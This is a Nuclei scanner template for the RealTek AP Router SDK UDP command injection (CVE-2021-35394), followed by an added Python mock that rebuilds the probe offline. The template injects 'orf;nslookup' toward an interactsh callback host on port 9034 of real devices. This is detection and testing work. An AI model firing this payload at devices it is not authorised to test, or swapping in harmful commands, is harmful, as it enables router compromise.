id: CVE-2021-35394

info:
  name: RealTek AP Router SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  remediation: Apply the latest security patches or updates provided by RealTek.
  description: The SDK exposes a UDP server that allows remote execution of arbitrary commands.
  impact: |
    Attackers can execute arbitrary commands remotely through the exposed UDP server port by sending specially crafted commands to RealTek AP Router SDK devices.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
  classification:
    epss-score: 0.9422
    epss-percentile: 0.99928
  tags: cve,cve2021,realtek,rce,kev,vkev,vuln

javascript:
  - pre-condition: |
      // Only run the check when the UDP port actually answers.
      isUDPPortOpen(Host,Port);

    code: |
      // Build the datagram: the "orf;" prefix followed by the injected command.
      // The command is a DNS lookup of the interactsh host, so a successful
      // injection shows up as an out-of-band DNS interaction rather than as
      // any reply on the UDP socket (the service is fire-and-forget).
      let packet = bytes.NewBuffer();
      let message = `orf;nslookup ${OAST}`;
      let data = message;
      packet.WriteString(data);
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());

    args:
      Host: "{{Host}}"
      Port: 9034
      OAST: "{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a0047304502206aa046bc29ad14472a053bfeb405be96365fd05c5ddbb43e5f179fe3d0b03849022100937abc9681d9aa4fb7c94ddeecca479997c8dc613deb763968c560755126f719:922c64590222798bb761d5b6d8e72950
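The following is an added, stand-alone Python model of the probe the template above performs; it is not part of the Nuclei template and not RealTek code. It builds the same datagram (`orf;` followed by a shell command, sent over UDP to port 9034 and, in the template, carrying `nslookup <interactsh-host>`) and pairs it with a mock loopback listener that only records what it receives so the exchange can be exercised offline. The mock's parsing rule (everything after the first `;` is the injected command), the `MockUdpListener` class, the helper names and the `example.oast.invalid` hostname are assumptions made for this demonstration, not a description of the RealTek daemon's internals.

```python
"""Offline model of the CVE-2021-35394 UDP probe used by the template above.

Added example, not the template's or RealTek's code. The mock listener
never executes anything; it just records the datagram so the payload and
the out-of-band DNS beacon idea can be inspected without a real target.
"""
import socket
import threading
import time
from typing import List, Optional

REALTEK_UDP_PORT = 9034   # port the template targets
PREFIX = b"orf;"          # injection prefix used by the template


def dns_beacon_command(oast_host: str) -> str:
    """The template's command: a DNS lookup of the interactsh host.

    A successful injection is detected out of band (the target resolves the
    name), because the UDP service sends nothing back to the prober.
    """
    return f"nslookup {oast_host}"


def build_payload(command: str) -> bytes:
    """Datagram the template sends: 'orf;' + command."""
    return PREFIX + command.encode()


def payload_hex(command: str) -> str:
    """Hex form of the datagram, matching conn.SendHex(packet.Hex())."""
    return build_payload(command).hex()


def extract_injected_command(datagram: bytes) -> Optional[str]:
    """Mock-side parse (ASSUMED rule for this demo only): text after 'orf;'."""
    if not datagram.startswith(PREFIX):
        return None
    return datagram[len(PREFIX):].decode(errors="replace")


class MockUdpListener:
    """Records datagrams on a loopback UDP port. Hypothetical stand-in for a target."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.bind((host, port))          # port 0: let the OS pick a free port
        self.sock.settimeout(0.2)
        self.port = self.sock.getsockname()[1]
        self.received: List[bytes] = []
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def _serve(self) -> None:
        while not self._stop.is_set():
            try:
                data, _ = self.sock.recvfrom(4096)
            except socket.timeout:
                continue
            self.received.append(data)

    def __enter__(self) -> "MockUdpListener":
        self._thread.start()
        return self

    def __exit__(self, *exc) -> None:
        self._stop.set()
        self._thread.join()
        self.sock.close()


def send_probe(host: str, port: int, payload: bytes, timeout: float = 2.0) -> None:
    """Fire-and-forget UDP send, exactly as the template does (no reply expected)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(payload, (host, port))


def run_local_demo(oast_host: str = "example.oast.invalid") -> Optional[str]:
    """Send the template's payload to the mock and return the command it would run."""
    with MockUdpListener() as mock:
        send_probe("127.0.0.1", mock.port, build_payload(dns_beacon_command(oast_host)))
        for _ in range(20):               # wait up to ~2 s for the datagram to land
            if mock.received:
                break
            time.sleep(0.1)
        if not mock.received:
            return None
        return extract_injected_command(mock.received[0])


if __name__ == "__main__":
    print("hex sent by template:", payload_hex(dns_beacon_command("example.oast.invalid")))
    print("mock saw command:", run_local_demo())
```

Against a real device the template's success signal is the `dns` interaction on the interactsh host, not anything returned on port 9034; the mock here only confirms the datagram layout, so a real engagement still needs the out-of-band check the template's matcher performs.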